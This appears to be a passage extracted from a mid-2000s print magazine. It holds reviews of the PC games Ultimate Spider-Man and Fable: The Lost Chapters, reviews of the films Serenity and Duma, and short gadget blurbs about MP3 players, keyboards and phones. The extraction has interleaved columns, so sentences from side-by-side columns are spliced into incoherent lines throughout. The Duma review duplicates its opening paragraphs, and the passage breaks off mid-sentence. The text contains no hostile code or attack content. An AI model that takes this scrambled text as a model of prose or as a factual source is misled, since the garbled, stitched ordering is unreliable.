more within a hero's given comic-book universe, as
achieving this goal by including plenty of friendly faces such
opposed to directly upon any of the aforementioned films.
as Wolverine and the Human Torch, as well as modern
Compare the recent Incredible Hulk and X-Men games
versions of big-time villains such as Carnage, Electro, Green
based within the comic universe with the Fantastic Four
Goblin, and, of course, Venom himself.
and Batman games based on films; the difference ought to
be clear. One franchise that's been stuck somewhere in the
middle over its last couple of installments is the Spider- The story ends up a winner because it sticks so closely to its
Man series. The first two games were based directly on the comic-book roots--it's just too bad that there isn't very much
megapopular films, and while neither could be called bad, of it. To get through the entire story mode, it shouldn't take
they weren't anything to write home about. Ultimate you more than a half-dozen hours at most, and only about
Spider-Man is developer Treyarch's third attempt to make five hours of that actually make up story missions. Ultimate
a quality Spidey game, by way of developer Beenox, Spider-Man retains the sort of open-ended nature of Spider-
which has ported the console game to the PC. Based on the Man 2, letting you roam around the city of New York,
eponymous comic-book series, Ultimate Spider-Man is swinging your way to assorted side missions scattered about
certainly an improvement, adding a great sense of comic- the town. Most of these are basic checkpoint races, combat
book style to the package and getting a whole host of missions in which your entire goal is to beat up a bunch of
familiar Marvel characters into the mix. Unfortunately, it gang members, and city events, which simply consist of
also suffers from some of the familiarly flawed gameplay quick-rescue operations and breakups of bank robberies or
of its predecessors, and it's a disappointingly short ride. what have you. These missions aren't optional, though. They
appear that way at first, but you'll soon find that you have to
beat them to unlock more story missions--and in some cases,
you only unlock a cutscene and then have to go back out into
the city to beat more side missions to move on again.
Essentially, it feels like the developers quickly ran out of
story and hastily decided to make these missions required
play to pad out the length.

This padding really does kill some of the fun, because the
races, of which you'll be doing the most of early on in the
game, just aren't much fun. The combat tours and city events
make more sense, since Spidey's known for swooping down,
whooping some ass, and then swinging away into the sunset.
But these missions are far too repetitive, requiring you to
perform many of the same tasks over and over again until
you just don't want to do them anymore. This is doubly
unfortunate, because that's pretty much all there is to do once
the story mode is over with.
Fortunately, the story missions are a lot better, especially the boss The city of New York has also been scaled down here, but
fights against the main villains, as well as the several sections that's not a detriment. Though there's less area to cover,
where you play as Venom. These fights are often challenging and the areas themselves look a lot better. That's thanks mostly
satisfying, though the final confrontation is a bit anticlimactic. to the game's entirely new art style, which uses a unique
The game also leans a little too heavily on chase missions, where cel-shading concept to give every character and set piece a
your goal is, again, to race around the city, but with the twist of brightly colorful and sharp look. The character models are
having to stay within a specific distance of the opposing so sharp looking, in fact, that they look like they've leapt
character. It's an OK idea in theory, but there are too many of off a comic page--though perhaps that's because the game
these sequences, and it can sometimes be tough to get a good goes to painstaking lengths to try to emulate the comic
bearing on where your target is, since there's no icon or anything book's style, creating multiple cutscenes that frame their
denoting where the target is--all you get is a sometimes unhelpful shots within the boxes of a comic. All this gives Ultimate
arrow to point you in the right direction. Were there more of the Spider-Man a wonderful sense of style that the previous
big, epic fights against the villains and more variety to the day-to- two games lacked. Admittedly, there are still a few
day rescues and crime stoppage, Ultimate Spider-Man would be a problems. The camera can get very uppity, especially in
lot better off. tight spaces, and the PC version suffers from a bad frame
rate in a lot of spots, especially when you're webswinging.
For those who played either of the last couple of Spider-Man Turning down effects makes no difference, nor does the
games, Ultimate Spider-Man features a couple of key gameplay resolution. Parts of this game simply don't run well.
differences. For one, the combat is less clunky. Spider-Man
attacks with simple, effective combos that don't require much Ultimate Spider-Man features no celebrity voice acting,
more than a few bits of button mashing. You can still combine but that's not a problem. The actors who portray the
Spidey's webs into the fray, but there's less you can actually do characters do excellent work lending realistic and
with that. Venom's attacks are similarly simple, though they rely sometimes appropriately goofy spins to these modernized
more on whips of his tendrils and powerful killing moves, unlike versions of classic characters. The dialogue is mostly quite
Spider-Man's quick and nimble maneuvers. Venom also has to sharp, getting Spidey's snarky tone down pat and dealing
deal with an ever-draining life force, requiring him to out a fair number of amusing one-liners. The only failing
occasionally feed on enemies and helpless passersby. It's pretty of the dialogue is that in-game, Spider-Man's wisecracks
brutal, since you can basically feed on and kill any man, woman, often repeat ad nauseam and get old quickly. The rest of
or child that happens into the brute's path. It also makes the the audio features plenty of thwacks, whaps, and biffs, as
Venom sequences a lot easier, since most areas give him plenty well as a fairly subdued soundtrack that seems to come in
of people with which to quench his thirst. Spider-Man's portions and out at random intervals--not because it's broken or
often lack health power-ups, which makes them a touch more anything, but it just isn't quite as well edited as it could
challenging--and sometimes, frustrating. have been.

The methodology for getting around New York has also been Ultimate Spider-Man is a better game than Treyarch's
simplified, though with mixed results. Spider-Man's previous efforts, but it still relies too heavily on the
webswinging mechanic requires a lot less effort on your part this novelty of swinging around the city and beating up the
time around. You can't shoot multiple webs anymore; you're same bad guys over and over again--a novelty made less
effectively limited to single, standard-swinging webs, as well as a so by the simplification of both mechanics. It's especially
web-boost shot that lets you leap great distances. Venom throws distressing that the developer was clearly able to put
all that webswinging by the wayside, opting to just leap hundreds together a solid story and some great boss fights, yet was
of feet in the air and occasionally use his tendrils to cover unable to cull together enough of them to make a great
distances quickly, not unlike in the web boost. While all of that's game. Serious webheads will get something positive out of
well and good, jumping and swinging around the city just isn't as Ultimate Spider-Man, but they should do so with one of
interesting as it's been in the past. The simplification of the the console versions, as the PC version of the game isn't
webswing mechanic also seems to have slowed the overall feel of the ideal one.
your swinging, and it's just not all that thrilling to swing around
the city--which is pretty much the opposite of the case in the past
games. Admittedly, it is neat to jump around with Venom, since
he does handle differently from Spidey, but there aren't many
Venom sequences in the game. Incidentally, regardless of which
character you're playing as, you're going to want to use a good
dual analog gamepad for this game. Keyboard and mouse
controls are too unwieldy for both combat and webswinging.
Fable – The Lost Chapters

Fable is an imaginative game that's got enough remarkable, You begin Fable as a young child, and it's here that you're
unique moments in it to make it shine. introduced to the game's moral alignment system, its sense of
humor, and its dark edge--as well as its basic controls, which
Some heroes are made when they rise to the occasion. Others will be mostly intuitive if you've played other third-person
build their reputations over time. This latter case is the perspective games recently. Your first order of business is to
subject of Fable: The Lost Chapters, a game in which you earn a few gold pieces with which to purchase a birthday gift
get to vicariously experience the life of an archetypal fantasy for your sister. Whether you make the money by being
hero, and, in some respects, decide what eventually becomes helpful or by making trouble is up to you. This initial
of him. Originally released for the Xbox last year, Fable was choose-your-own-adventure-style sequence is quite
one of the most highly anticipated games since the Xbox's impressive in the amount of freedom and variety it affords
debut, and the latest title overseen by visionary game you, and it suggests that Fable will constantly challenge you
designer Peter Molyneux since 2001's innovative Black & to make moral decisions like the ones presented early on. For
White. Like that game, Fable invites you to solve problems example, will you help a little kid fend off a bully, or will
either by being good or by being evil, and to watch as the you join in on the bullying (or beat them both up)? These
effects of your decisions gradually take a noticeable toll on decisions are so ethically basic that they're not at all difficult
your persona. Fable also features a number of novel to make, but it's still interesting to see how the game plays
elements, such as how your hero's appearance gradually out depending on what you do. You'll discover, though, that
changes with age, and how villagers respond differently to Fable's introduction is not reflective of most of the game's
him depending on his reputation, looks, and other factors. quests, which don't give you many choices. At any rate, soon
These elements serve to significantly differentiate a game after you complete your first main task, something sinister
that's actually pretty straightforward in terms of how it plays. happens. Fortunately for your young character, he is saved
Beneath the surface, Fable is a well-put-together but standard by an enigmatic man who transports him to the Heroes'
action adventure, primarily consisting of lots of basic combat Guild, where he is to be trained to become an adventurer.
and running from point to point. Mind you, this is a
decidedly great game, all in all. Its most interesting, riskiest
features may lie at the fringes rather than at the core--but
they're there.

If you're familiar with the Xbox version of Fable, you'll find


that Fable: The Lost Chapters is essentially the same game,
though it's been tuned to work well for the PC and gains a
significant amount of new content. That is, the 12 months
since the release of the original apparently were well spent--
this game isn't any worse for wear today. The new Lost
Chapters storyline picks up immediately following the
conclusion of the original Fable's main quest, challenging
you to explore the treacherous north of the world of Albion,
and conquer a great threat lurking there. Featuring new
places to explore, new items to find, and new monsters to
fight, plus lots of new dialogue and cutscenes, the additional
content of The Lost Chapters is at least as good as that of the
original game, and it blends in seamlessly with the rest. It's
like getting an expansion pack together with the original
game, and The Lost Chapters helps address one of the
original Fable's problems, which is that it was quite short.
Fable veterans will of course need to play through the game
again in order to get to the new stuff, and the additional Cut to your hero's teenage years. At the Heroes' Guild, you're
quests amount to only a few more hours of gameplay, if you instructed on how to fight with melee weapons, a bow and
play straight through them. So while fans will surely enjoy arrow, and the powers of will--otherwise known as magic.
the new content, it isn't necessarily enough to justify getting All three of these fighting styles are relatively simple to use,
a second copy of the game. And if you're new to Fable, you'll but they work well. It's possible to lock onto nearby targets,
be better off for all the stuff that's been added. Other than the and you can switch between ranged and melee weapons
new content, Fable's controls and presentation have been easily. Melee combos are unleashed just by left-clicking
translated very well to the PC, to the point where the game repeatedly.
barely shows its console roots.
Some foes will block your attacks, but you can penetrate
their defenses either by maneuvering behind them or by Fable's combat has a pretty good, solid feel to it as you
using a slower, stronger, unblockable strike that becomes wallop your foes with swords, axes, maces, crossbows, and
available after every few normal strikes. Archery works more. But the combat isn't really a challenge once you
similarly but is more methodical--the longer you press and inevitably figure out a few key tricks. Items that quickly or
hold the attack button, the more fiercely you'll draw your instantly restore your health will be available in copious
bow, resulting in significant damage per hit. Actually, supply, letting you recover your energies in a pinch, even in
archery may not seem altogether practical in Fable. It can be the midst of battle. You'll also probably end up hoarding
plenty effective, but since you'll be fighting most foes single- numerous "resurrection phials," which automatically restore
handedly, and most of them will quickly close the distance all your health should you be struck down. Once you learn
between you, toe-to-toe combat proficiency will seem like Fable's controls and figure out its fairly complex leveling-up
the obvious first choice. A few flying enemies will require system, you'll have overcome its greatest challenges.
you to put your unlimited arrows to good use, though.
Of course, you won't be fighting hordes of foes while you're
Magic is unquestionably valuable in Fable. You'll start off still training at the Heroes' Guild. After the training is
with a simple lightning attack, but you'll be able to spend complete, you're invited (rather awkwardly, via an onscreen
experience points on more than a dozen other different spells prompt) to continue on to your hero's adulthood, the time
(and upgrades to those spells). There are spells that do such during which the vast majority of Fable takes place. You can
things as temporarily boost your strength and speed or get through the younger years in about an hour, and the rest
temporarily cause time to slow down all around you, letting of the story is fairly brief and will take you maybe 10 or 12
you easily outmaneuver foes. (Descriptions of these spells hours on your first run, including the content of The Lost
make them sound very useful, and, in fact, they are.) Magic Chapters--that's if you ignore a few available side quests,
is a little awkward to use at first: You need to hold down the though these don't pad the game's length much further.
shift button to access your spells, then you have to use your Fortunately, Fable's world is sprinkled with little hidden
mousewheel to cycle through your available spells, if you secrets--collectible special keys, talking demon doors
have more than a couple. But this is easy enough to get used challenging you to open them up in some obscure fashion,
to, and worth getting used to sooner rather than later, concealed treasure chests, and so forth--and these give the
because magic helps make Fable's frequent battles pretty game some additional lasting value. Ironically, though, there
easy, for better or worse. isn't a clear incentive to play through the entire game over
from scratch once you've finished it the first time. Yet,
however you choose to spend your time with the game, you
should be able to squeeze a good 20 to 30 hours out of it
when all is said and done.

Fable's storyline, which is punctuated by an elegant sequence


of paintings showing your hero's latest exploits, is mostly
linear and starts slowly, after you get past the childhood
prologue. Past the halfway point, it actually becomes fairly
involved, since its few key characters become relatively
fleshed out. However, the hero himself remains silent during
all the proceedings, and all the moral decisions you've made
have little effect on what happens or how it happens. The
game does have multiple endings, depending on your
morality and the ultimate decisions you make, but each
version of the epilogue is very brief, and it's fairly easy to
see the numerous different alternatives without having to
play through the game from the beginning. This is partly
because your character's morality can be reversed just by
You'll face a fairly diverse variety of foes during the course visiting one of two different locations in the game,
of the game, some of which will seem reasonably smart. respectively devoted to a good and an evil god. All you need
Bands of bandits will fire on you with crossbows, switch to to do is pay a hefty donation and your evil or good deeds will
swords as you approach, and attempt to flank you. Undead be negated--and, toward the end of the game, you should
will spring right out of the ground underneath your feet. have plenty of money to spend. The inclusion of these
Creatures resembling werewolves will lunge at you from all temples seems somehow unfortunate, as they can undermine
directions. Yet all these foes can be defeated handily in the deliberate process through which your character's nature
groups, using the same types of tactics. normally emerges.
Furthermore, the fact that you may continue exploring the
game's world of Albion even after you've finished the main There are other aspects to Fable's personalization system
storyline means that you'll be able to see most of what Fable worth noting. Your alignment will gradually give you access
has to offer without having to restart. Part of the appeal of to various social gestures--a nasty insult if you're evil, or an
role-playing games that purport to let you live by the apology if you're good, for instance. The Lost Chapters adds
consequences of your actions is that they offer significant more on top of the original game's options. Using these in
replay value. However, that's not necessarily true of Fable, civilized settings yields results that are, at least, frequently
though the game does have lots of interesting peripheral funny. Ultimately, there really isn't much to character
content to explore on your first go-round. The thing is, you interaction in Fable. However, gesticulating in various ways
might miss it if you simply follow Fable's main quest, finish and watching as villagers react differently to you based on
it, and reckon you're done. If that happens, you'll have your attire and reputation can be entertaining for a while. So
experienced a quality action adventure game, but you will can a few different tavern games available at the drinking
have missed out on most of what makes Fable special. establishments in Fable's handful of villages. The
extracurricular activities don't stop there: You may also get
It's fun to see your character develop as you play. You can married (and divorced), which is another fairly basic process
get a nice close-up look at the hero at any time at the touch that leads to some amusing results; expect your spouse to
of a button, and you'll see him visibly age and transform in have some choice words for you whenever you change your
other ways during his adulthood. It's possible to adorn your appearance. You may purposely or inadvertently commit all
hero with different hairstyles and tattoos--which don't have kinds of different crimes while in town, from brandishing a
much impact on gameplay (as you'd probably expect), but weapon to breaking windows to shoplifting, and the guards
may nonetheless cause certain villagers to respond to you will come looking for you if you do--you can pay a fine, flee,
differently. Your clothing or armor can have a similar effect, or try to fight them. There are other nice little details here
but the most interesting visual changes to the hero occur as a and there. As day turns to night, villagers will light street
result of your moral choices. Act evilly, and soon enough lamps and shutter their doors. Taverns are always bustling
you'll sprout horns, walk with a hunch, and gain blood-red with customers. The way the game's nonplayer characters act
eyes; act like an angel and you'll gradually gain a divine aura and respond to you eventually becomes pretty transparent,
around you. There's a dramatic range of appearances but messing around with them as though this were a virtual
possible for your main character, and even though the ant farm can be rewarding.
For most of the structured gameplay, you'll be undertaking
variations are mostly cosmetic, it's still very impressive.
quests that are the stuff of standard-issue fantasy. Rescue
Your character even becomes weathered and scarred from
missions, dungeon crawls, showdowns against powerful
constant battle.
foes, and all the other clichés make their appearances in
Fable. None of the quests take very long to accomplish,
thanks partly to your hero's convenient ability to teleport
around the world, as well as to the onscreen minimap that
always points you in the right direction. Fable's quests offer
a bit of varied challenge in how they allow you to "boast" for
additional rewards by agreeing to take on bigger risks.
Basically, you're able to take dares on certain quests, such as
vowing to go through a mission "naked" (just in your Union
Jack-emblazoned underpants, that is), or to slay every foe
from the mission's beginning to end, or to complete your
objectives in a certain period of time. These boasts can add
an extra bit of challenge and variety, but they aren't really
necessary. The penalty for a failed boast isn't severe, but if
you fail the quest altogether...you have no choice but to
restart that quest and keep trying until you succeed. It's
strangely disorienting to be required to restart a simple side
quest from the beginning when Fable is presumably a game
about living with the consequences of your actions. Again,
though, the game isn't hard, so the threat of having to replay
quests doesn't turn out to be much of a problem.
As you complete your missions and slay opponents, you'll gain
experience points, which you can spend to customize your The game's various environments, which include your standard
character and how he actually plays. This leveling-up system is fantasy trappings like forests, swamps, caverns, and
quite good, and unlike some of Fable's novelty elements, it graveyards, are dense with color and little atmospheric touches.
actually adds depth to the gameplay. Basically, you'll get to Weather effects look very real, and other effects for spells and
improve your character's various abilities within three different such are also great. But the best-looking aspect of the game is
pools: strength, skill, and will. Strength abilities influence your certainly the hero himself and his gradual metamorphosis into
melee power, toughness, and maximum health. Skill abilities whatever you're trying to turn him into. Watching your hero
affect your speed, archery, the prices you get from merchants, take shape over time is a one-of-a-kind experience that, in and
and your ability to sneak. Will abilities govern your maximum of itself, encourages spending lots of time playing Fable.
magic power and available spells. Interestingly, you gain
experience points in each of these three categories separately, as The same is absolutely true of the audio, which is quite
you fight using melee, archery, and magic, respectively. You also possibly the best part of the game. A beautiful classical-style
earn a fourth, general type of experience on top of that, which can orchestral score plays pleasantly throughout the game,
be spent on any of the three ability sets. All abilities within each changing its tone and mood effortlessly to fit each different
of the three pools are available right from the get-go, and it's a lot type of setting and situation. Ambient sound effects match or
to take in. Fortunately, some helpful text and voice-over clearly even surpass the richness of the graphics. The game's voice
explains how each option may be useful to you. acting (all of it is British) is of very high quality overall, and
there's a ton of spoken dialogue to be heard. You'll
Though this system works very well, it discourages pure occasionally hear some repeated lines as you wander through
specialization. You might start out hoping to become the best towns, and this is really the only strike against a game whose
possible fighter or magic user...but eventually, you'll find sound is amazingly well done.
yourself having to spend exponentially more experience for
limited gains in your chosen field, versus spending relatively Fable is an imaginative game that's got enough remarkable,
small quantities of experience points to gain proficiency in new unique moments in it to make it shine. That many of these
skills. So you're almost certainly going to wind up as some sort of moments happen to be good for a laugh is all the better. It's
hybrid fighter/archer/wizard, though you'll still probably lean true that the game's high points are not always frequent--its
toward specific sets of skills, of which there are numerous viable ambitions are evident but not always fulfilled, and the
combinations. pervasively playful spirit of the game sometimes is mired by
convention. These trespasses are more than excusable, though.
The sum total of Fable's elements is a decidedly interesting mix Regardless of how much time you ultimately spend playing
that invites, and often rewards, exploration and experimentation. Fable, you're not likely to forget the experience for a long
That's great, but for what it's worth, the game doesn't entirely while.
succeed at making you feel like you are the hero. The epic
premise doesn't quite translate into an epic experience. This is
mostly because the form and structure of the gameworld feel
contrived. Fable consists of a sequence of relatively small,
winding, interconnected maps, separated by brief but noticeable
load times. The hero himself has no personality (and never
speaks, except for a few short, gruff phrases when you make him
emote), and the game's cookie-cutter nonplayer characters, while
often amusing, don't come across as lifelike. Fable's juxtaposition
of cheeky humor and surprisingly serious story themes also
seems odd, as the humor tends to overshadow aspects of the story
that otherwise could have seemed much more dramatic, had the
game maintained a more even tone. All of this makes the world
of Fable seem very much like a sandbox (in which your
imagination will be the key to your enjoyment) rather than a fully
realized and cohesive fantasy setting--the kind that really draws
you in and makes you feel like a part of it. In Fable, you'll often
feel more like the director than like the star of the show.

Fable is excellent from a technical standpoint, featuring highly


detailed visuals brought to life by soft, colorful ambient lighting,
which gives the entire game an appropriately dreamlike, wispy
look. Little details are everywhere, and character animations are
nicely exaggerated, making the inhabitants of Fable appear larger
than life.
Serenity
Joss Whedon's intimate sci-fi epic "Serenity" rockets It's a promise Whedon keeps.
straight out of the universe of second chances.
Outer space as the new western frontier isn't anything
Whedon seems to have cornered this market, having new. In fact, when Gene Roddenberry was trying to sell
penned 1992's lackluster "Buffy the Vampire Slayer" "Star Trek" to networks, he pitched it as "'Wagon Train'
feature, only to resurrect it five years later as the cult TV to the stars." Whedon takes the metaphor even further.
phenomenon starring Sarah Michelle Gellar.
Characters talk in an artificial "OK Corral" vernacular
"Serenity" takes the reverse course. It's the sequel to (people are always "fixin'" to do something), pausing
Whedon's groundbreaking "Firefly" TV series, which only to swear in Chinese. Mal's love interest, Inara
was mishandled (episodes aired out-of-order), then (Morena Baccarin), works as a Companion, a revered
unceremoniously dumped by the suits at Fox. Fans class of intergalactic saloon courtesan. Space battles are
protested and DVD sales of the series helped Whedon at a minimum, since Serenity doesn't have any guns. No
push "Firefly" through the black hole of cancellation to aliens. No transporter beams. No phasers on stun.
the silver screen.
"Firefly" was never about the techie stuff, and unlike its
peers, "Serenity" isn't designed to sell action figures
(although, yes, there are toys). Instead, it's a character-
driven series about fundamental human issues: love, the
morality of genetic engineering, big government, etc.

Even so, "Serenity's" special effects look remarkable.


Instead of offering intricately designed space fights on a
static screen, the action sequences look as if they were
And oh, what a movie it is. "Serenity" is a brash, funny, captured on a hand-held camera, often out-of-focus and
action-packed bit of sci-fi ecstasy—and a giant blazingly fast, much like the human eye sees.
raspberry to the execs who let "Firefly" fall out of the
sky. But Whedon's primary allegiance remains with the
human heart. Though the Inara/Mal relationship gets
But you needn't have seen a single episode to be blown short shrift (mostly due to screen time allotted them, one
away by "Serenity." Its first five minutes plunges suspects), pixieish mechanic Kaylee (Jewel Staite)
audiences into Whedon's esoteric universe of outlaws finally reveals her twitterpation with Simon. Second-in-
living on the fringe of the Wild West-style frontier of command Zoe (Gina Torres), her pilot husband Wash
space. (Alan Tudyk) and mercenary Jayne (Adam Baldwin)
also faces major changes—but keeping the Serenity clan
The movie begins with Capt. Malcolm "Mal" Reynolds intact remains the central theme.
(Nathan Fillion) struggling to keep the crew of
spaceship Serenity together. Taking on fugitive siblings "Serenity" carries an unexpectedly high body count and
Simon (Sean Maher) and telepathic River (Summer is far nastier than audiences may bargain for. Mal's face-
Glau) has caused considerable strain on Serenity's off with the Alliance's operative feels a tad unsatisfying,
fractured crew of smugglers—mostly because the if only because it defies convention. Then again,
unstable, unpredictably violent River is an escaped Whedon has made a career thumbing his nose as
government she-weapon. convention.

The Alliance, Whedon's totalitarian galactic state, wants With "Serenity," Whedon has his cake and eats it too—
River back—even at the cost of starting a small wrapping up most of the major plots and themes of
interplanetary war. Actor Chiwetel Ejiofor plays "Firefly," while leaving the door open (just a crack) for a
Serenity's deadly nemesis, an unnamed "operative" with new series—maybe even another film. This second
steely resolve and murderous methods. The calm, polite chance deserves a third.
Ejiofor is the greatest asset in Whedon's war of
ideologies.

"[When] I start a fighting a war, I guarantee you'll see


something new," Reynolds says.
'Serenity'

Written and directed by Joss Whedon; cinematography by Jack N. Green; production design by Barry
Chusid; music by David Newman; edited by Lisa Lassek; produced by Barry Mendel. A Universal
Pictures release; opens Friday. Running time: 1:59. MPAA rating: Rated PG-13 (for sequences of intense
violence and action, and some sexual references).

Capt. Malcolm "Mal" Reynolds - Nathan Fillion

Zoe - Gina Torres

Hoban "Wash" Washburn - Alan Tudyk

Jayne Cobb - Adam Baldwin

Kaylee Frye - Jewel Staite

Dr. Simon Tam - Sean Maher

River Tam - Summer Glau

Shepherd Book - Ron Glass

Mr. Universe - David Krumholtz

The Operative - Chiwetel Ejiofor


Duma

The 12-year-old boy helped raise the cheetah, after he and


his father found it as a cub. The boy, named Xan, lives on
a farm in South Africa, where he and Duma form a strong
bond, but their friendship cannot last forever. An
emergency forces the family to move to the city, and Xan
realizes that Duma, now fully grown, should be returned to
the wild.
There might be reasonable ways of doing that. Perhaps
Xan (Alex Michaeletos) could call the animal welfare
people. Instead, without telling his mother (Hope Davis),
he decides to personally return Duma to the wilderness.
There is a scene of the cheetah riding in the sidecar of an
old motorcycle, which Xan drives into the desert. It could
be a cute scene, maybe funny, in a different kind of movie,
but "Duma" takes itself seriously, and is not a cute "Duma" is an astonishing film by Carroll Ballard, the director
children's story but a grand tale of adventure. who is fascinated by the relationship between humans, animals
Xan has courage but not a lot of common sense. He is and the wilderness. He works infrequently, but unforgettably.
headed into the Kalahari Desert, where to get lost is, Perhaps you have seen his "The Black Stallion" (1979), about a
usually, to die. Of course the motorcycle runs out of gas. boy and a horse who are shipwrecked, and begin a friendship that
Then he meets another wanderer in the desert, named leads to a crucial horse race. Or his "Never Cry Wolf" (1983),
Ripkuna (Eamonn Walker), who once worked in the mines based on the Farley Mowat book about a man who goes to live in
of Johannesburg but now prefers to work alone, perhaps the wild with wolves. Or the wonderful "Fly Away Home"
for reasons we would rather not know. He warns Xan of (1996), about a 13-year-old girl who solos in an ultralight
the dangers ahead ("That is a place of many teeth, my aircraft, leading a flock of pet geese south from Canada.
friend; that is a place to die"). He has the knowledge to
save the boy and the cheetah. But what is his agenda? The The wolf and geese stories were, incredibly, based on fact. So,
12-year-old boy helped raise the cheetah, after he and his perhaps even more incredibly, is "Duma." There really was a boy
father found it as a cub. The boy, named Xan, lives on a and a cheetah, written about in the book How It Was With
farm in South Africa, where he and Duma form a strong Dooms, by Xan Hopcraft and his mother, Carol Cawthra
bond, but their friendship cannot last forever. An Hopcraft. Even more to the point: This movie shows a real boy
emergency forces the family to move to the city, and Xan and a real cheetah (actually, four cheetahs were used). There are
realizes that Duma, now fully grown, should be returned to no special effects. The cheetah is not digitized. What we see on
the wild. the screen is what is happening, and that lends the film an eerie
There might be reasonable ways of doing that. Perhaps intensity. Animals are fascinating when they are free to be
Xan (Alex Michaeletos) could call the animal welfare themselves; when they are manipulated by CGI into cute little
people. Instead, without telling his mother (Hope Davis), actors who behave on cue, what's the point?
he decides to personally return Duma to the wilderness.
There is a scene of the cheetah riding in the sidecar of an How is this film possible? There are shots showing a desert
old motorcycle, which Xan drives into the desert. It could empty to the horizon, except for the boy and the cheetah. No
be a cute scene, maybe funny, in a different kind of movie, doubt handlers are right there out of camera range, ready to act in
but "Duma" takes itself seriously, and is not a cute an emergency, but it is clear the filmmakers and the boy trust the
children's story but a grand tale of adventure. animals they are working with.
Xan has courage but not a lot of common sense. He is
headed into the Kalahari Desert, where to get lost is, True, cheetahs are a special kind of big cat; Wikipedia informs
usually, to die. Of course the motorcycle runs out of gas. us, "Because cheetahs are far less aggressive than other big cats,
Then he meets another wanderer in the desert, named cubs are sometimes sold as pets." Yes, but a pet that can, as Xan
Ripkuna (Eamonn Walker), who once worked in the mines tells his dad (Campbell Scott) "outrun your Porsche." A pet that
of Johannesburg but now prefers to work alone, perhaps is a carnivore. It would seem that Duma can be trusted, but as W.
for reasons we would rather not know. He warns Xan of G. Sebald once observed, "Men and animals regard each other
the dangers ahead ("That is a place of many teeth, my across a gulf of mutual incomprehension."
friend; that is a place to die"). He has the knowledge to
save the boy and the cheetah. But what is his agenda?
And if Duma can be trusted, can the African man, Ripkuna? Where is he leading them? He must know that a reward has
been posted for the missing boy, and that a tame cheetah can be sold for a good amount of money. While these questions
circle uneasily in our minds, "Duma" creates scenes of wonderful adventure. The stalled motorcycle is turned into a wind-
driven land yacht. A raft trip on a river involves rapids and crocodiles. The cheetah itself plays a role in their survival.
And the movie takes on an additional depth because Xan is not a cute one-dimensional "family movie" child, and
Ripkuna is freed from the usual cliches about noble and helpful wanderers. These are characters free to hold surprises in
the real world.

Watching this movie, absorbed by its storytelling, touched by its beauty, fascinated by the bond between the boy and the
animal, I was also astonished by something else: The studio does not know if it is commercial! The most dismal
stupidities can be inflicted on young audiences, but let a family movie come along that is ambitious and visionary, and
distributors lose confidence. It's as if they fear some movies are better than the audience can handle.

"Duma" has had test runs in the Southwest. Now it opens in Chicago, and the box office performance here will decide its
fate. That is not a reason to see it. Moviegoers do not buy tickets to "support" a movie, nor should they. The reason to see
"Duma" is that it's an extraordinary film, and intelligent younger viewers in particular may be enthralled by it.
Tux iPod Stand

Astone Allure Series of Stainless


Steel MP3 Players

The Plasticsmith raises the art of fetish to new level


with their Tux iPod stand. This lucite beastie comes in
two flavors, Tilt and Upright, and accentuates your
iPod like nothing else in the world, aside from a silk
scarf and a beret.

Sony Bean

Check out this high quality stainless steel construction


MP3 players. It plays MP3, WMA & WMA DRM, has
a FM Radio, Voice Recording and mass data storage
function. It even has MP3 Line-In Encoding for
recording from external audio sources. You can listen
and record FM radio simultaneously. It is USB2.0-
compliant, comes in a stainless steel/black casing, and
will be available in 256, 512 MB and 1GB capacities.
The Sony Bean, (named so because it is shaped like a There are three different versions of the players & the
bean) is a small flash MP3 player with a one-line main differences between the three versions are... their
OLED screen. It is described by Sony Corp. as shape. One of them is shaped like a dull rectangle,
“Playful, Powerful, and Compact.” another like a circle, & the third one as a triangle.
It plays MP3s & Sony’s Atrac3plus format. It has a Known not are prices yet.
pop-up USB connector. Sony claims that it can run for
50 hours on one charge. The beans are available in
different flavors or colours: Tropical Ice (Blue), Cotton
Candy (Pink), Licorice (Black) and Drowned Cadaver
(White). There will even be a model with a built-in FM
tuner. And it claims that it support’s Sony’s
CONNECT service.
Star Wars-branded Alienware PCs Logitech MX 5000 LCD Keyboard

Alienware has created a Star Wars-branded desktop Logitech has released an LCD keyboard for the regular
system. The special Aurora models are available in computer users. This keyboard has a slew of
Dark Side and Rebel Alliance flavors. The systems interesting features including an external temperature
come equipped with the AMD Athlon 64 FX-55 CPU. sensor, a ‘dashboard’ displaying the time and current
They’ll be on sale to the public soon for a yet user, along with media and email notifications. There’s
undisclosed price. even a feature that turns the keyboard itself into a
calculator, using the keypad, and then pastes the results
into the clipboard. Plus it’s cordless. Super cool.

Max Shooter Console PS/2 Adapter


for X-box & PS2 Logitech G15 Gaming Keyboard

Logitech has finally released a keyboard tailored to the


computer gamer. The new Logitech G15 has some nice
features that are actually tailor-made for gamers. The
most acknowledged feature is probably the LCD
screen on the keyboard. Keyboard macros can be setup
Well the name says it all. This peripheral will finally on the physical keyboard while in game. Also while
give the PC gamers a chance to prove themselves when not gaming the LCD screen can read media
playing on PS2 & X-box. Especially if u are playing information, display CPU information, email alerts and
Xbox Live. Simply plug in this device, then connect a the keyboard even comes with a software development
PS/2 keyboard and mouse into it and you are ready to kit so the coding gamers can write their own programs
play with some of the default configurations already to display information on the LCD. Backlit keys and a
saved. The Max Shooter comes preloaded with “gaming button” that disable the windows key are also
configurations for many of the latest FPS games out nice.
and also allow for customization.

The actual adapter is small in size and doesn’t hog any


serious amount of extra space. The XBOX version
features an extra slot on the backside of the adapter for
a memory card to plug in.
OziQ All-In-One PC I-mate SP3i

All-in-one PCs have been around for a while now, but


this one is pretty unique. Tucana Innovations, an
Australian company, has fitted the entire PC, optical
drive and all, behind a standard LCD panel. Good for
people u like the design of the Mac, it is useful for
being used as small desktops, or in libraries, kiosks,
etc.

This is a hardcore smart phone for those hardcore


mobile warriors of today. I-mate sports Windows
Mobile 2003 edition for a giant explosion of
PDA/smart phone capabilities. This phone has it all:
Internet Explorer, Media Player, Bluetooth,
LG B2250 Wafer Thin expandable memory, IR port, email, USB charging,
large screen, extra batteries and even a calculator.

Motorola RAZRBerry

LG Corp. is crafting a new tri-band GSM phone that is


just 15mm (.59”) that right just 15mm thin. Before you
bay for my blood & compare this to the Siemens CC75
phone which is .50” let me tell you the other features.
It features a 262k TFT screen and a multi-color
backlight. It is a Tri-Band phone with GPRS, WAP,
Java, VGA-camera, 40-tones polyphony, MMS, SMS
and EMS, Measures converter, Calculator and World
Time. It runs on a Li-Ion 780 mAh battery, which
gives you a Talk time of up to 3.5 hours and Standby
time up to 250 hours.

The new Motorola RAZR features Windows Mobile


OS 5 and sports the new Freescale Neptune LTE +
Intel Bulverde Chipset. It is a Quadband GSM phone,
with GPRS (Class 10), EDGE (Class 6), 64 MB Pioneer VSA-AX4AVi and VSX-
